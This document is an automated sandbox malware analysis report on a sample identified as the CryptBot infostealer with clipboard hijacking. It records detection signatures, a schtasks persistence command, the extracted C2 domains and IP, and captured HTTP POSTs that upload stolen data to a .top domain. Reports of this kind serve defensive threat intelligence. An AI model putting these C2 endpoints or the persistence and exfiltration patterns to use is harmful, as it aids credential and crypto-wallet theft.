Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1538133
MD5:	b00d4277cdeb811fdccc08e336223231
SHA1:	cb57043aae0a7feb24ab3b2a3593517f491f3864
SHA256:	992bd4bb6280e1d946ce2a65c5ee6c620b3074a3195c96595f3396ce33369922
Tags:	exeuser-Bitsight
Infos:

Detection

Clipboard Hijacker, Cryptbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Clipboard Hijacker

Yara detected Cryptbot

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops large PE files

Found evasive API chain (may stop execution after checking mutex)

Found many strings related to Crypto-Wallets (likely being stolen)

Found stalling execution ending in API Sleep call

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7472 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B00D4277CDEB811FDCCC08E336223231)

service123.exe (PID: 8164 cmdline: "C:\Users\user\AppData\Local\Temp\service123.exe" MD5: F5C1A872DFB371DD7C67A5060BBCAA88)

schtasks.exe (PID: 7256 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

service123.exe (PID: 6932 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: F5C1A872DFB371DD7C67A5060BBCAA88)

service123.exe (PID: 4948 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: F5C1A872DFB371DD7C67A5060BBCAA88)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Malware Configuration

Threatname: Cryptbot

{"C2 list": ["oosevtbb17sb.top", "sevtbb17sb.top", "analforeverlovyu.top", "7sb.top", "ozsevtbb17sb.top", "+sevtbb17sb.top"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2493917636.0000000001B68000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: file.exe PID: 7472	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: file.exe PID: 7472	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7472	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: service123.exe PID: 8164	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.service123.exe.6c2f0000.1.unpack	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7472, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, ProcessId: 7256, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Suricata Signatures

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-20T15:25:10.872239+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49730	193.46.218.44	80	TCP
2024-10-20T15:25:12.168867+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49731	193.46.218.44	80	TCP
2024-10-20T15:25:14.218664+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49732	193.46.218.44	80	TCP
2024-10-20T15:25:15.483557+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49733	193.46.218.44	80	TCP
2024-10-20T15:25:16.760159+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49734	193.46.218.44	80	TCP
2024-10-20T15:25:18.226595+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49735	193.46.218.44	80	TCP
2024-10-20T15:25:20.334637+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49738	193.46.218.44	80	TCP
2024-10-20T15:25:22.098674+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49741	193.46.218.44	80	TCP
2024-10-20T15:25:23.733683+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49744	193.46.218.44	80	TCP
2024-10-20T15:25:27.826252+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49748	193.46.218.44	80	TCP
2024-10-20T15:25:29.449127+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49750	193.46.218.44	80	TCP
2024-10-20T15:25:30.985360+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49752	193.46.218.44	80	TCP
2024-10-20T15:25:32.634600+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49754	193.46.218.44	80	TCP
2024-10-20T15:25:34.042772+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49755	193.46.218.44	80	TCP
2024-10-20T15:25:35.613560+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49756	193.46.218.44	80	TCP
2024-10-20T15:25:37.091890+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49757	193.46.218.44	80	TCP
2024-10-20T15:25:38.607562+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49758	193.46.218.44	80	TCP
2024-10-20T15:25:40.064762+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49759	193.46.218.44	80	TCP
2024-10-20T15:25:41.567323+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49760	193.46.218.44	80	TCP
2024-10-20T15:25:43.004739+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49761	193.46.218.44	80	TCP
2024-10-20T15:25:44.455495+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49762	193.46.218.44	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: file.exe.7472.0.memstrmin

Malware Configuration Extractor: Cryptbot {"C2 list": ["oosevtbb17sb.top", "sevtbb17sb.top", "analforeverlovyu.top", "7sb.top", "ozsevtbb17sb.top", "+sevtbb17sb.top"]}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_00C115B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		5_2_00C115B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2F14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		5_2_6C2F14B0

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea ecx, dword ptr [esp+04h]	5_2_00C181E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C36AEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C36AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C36AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C310860
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C31A970
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C31A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C31A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6C3CF960h	5_2_6C30EB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C314453
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	5_2_6C3984A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C31C510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C31A580
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C31A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C31A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C31E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C31E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, ecx	5_2_6C390730
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C310740
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C36C040
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C36C1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+04h]	5_2_6C34A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C310260
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [6C3CD014h]	5_2_6C3C4360
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C36BD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C367D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	5_2_6C363840
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+04h]	5_2_6C31D974
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C32BBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C32BBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C36B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C31D504
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	5_2_6C369600
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+0Ch]	5_2_6C31D674
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6C3CDFF4h	5_2_6C363690
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+08h]	5_2_6C31D7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	5_2_6C393140
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C30B1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C31D2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	5_2_6C387350

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49730 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49734 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49732 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49756 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49755 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49762 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49741 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49733 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49731 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49752 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49748 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49738 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49744 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49758 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49759 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49754 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49757 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49750 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49760 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49735 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49761 -> 193.46.218.44:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: oosevtbb17sb.top
Source: Malware configuration extractor	URLs: sevtbb17sb.top
Source: Malware configuration extractor	URLs: analforeverlovyu.top
Source: Malware configuration extractor	URLs: 7sb.top
Source: Malware configuration extractor	URLs: ozsevtbb17sb.top
Source: Malware configuration extractor	URLs: +sevtbb17sb.top

Source: Joe Sandbox View

ASN Name: CUBENODEES CUBENODEES

Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary52394516User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 411Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary52394516User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 411Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary52394516User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 411Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary52394516User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 411Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary52394516User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 411Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary41997986User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 63800Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary41997986User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 63800Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary41997986User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 63800Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary41997986User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 63800Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary15133046User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 27504Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary15133046User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 27504Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary15133046User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 27504Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary15133046User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 27504Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary15133046User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 27504Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary15133046User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 27504Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary15133046User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 27504Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary15133046User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 27504Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary15133046User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 27504Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary15133046User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 27504Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary15133046User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 27504Host: sevtbb17sb.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary15133046User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 27504Host: sevtbb17sb.top

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: sevtbb17sb.top

Source: unknown

HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary52394516User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 411Host: sevtbb17sb.top

Source: file.exe, 00000000.00000002.2514835607.0000000001A94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2514835607.0000000001AEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/
Source: file.exe, 00000000.00000002.2514835607.0000000001AEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/./
Source: file.exe, 00000000.00000002.2514835607.0000000001AEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/0/
Source: file.exe, 00000000.00000002.2514835607.0000000001A94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/I
Source: file.exe, 00000000.00000002.2514835607.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2514835607.0000000001A94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.php
Source: file.exe, 00000000.00000002.2514835607.0000000001A94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.phpB
Source: file.exe, 00000000.00000002.2514835607.0000000001A94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.phpL
Source: file.exe, 00000000.00000002.2514835607.0000000001A94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.phpP
Source: file.exe, 00000000.00000002.2514835607.0000000001A94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbb17sb.top/v1/upload.phpV
Source: file.exe, 00000000.00000003.1923962283.000000000232E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
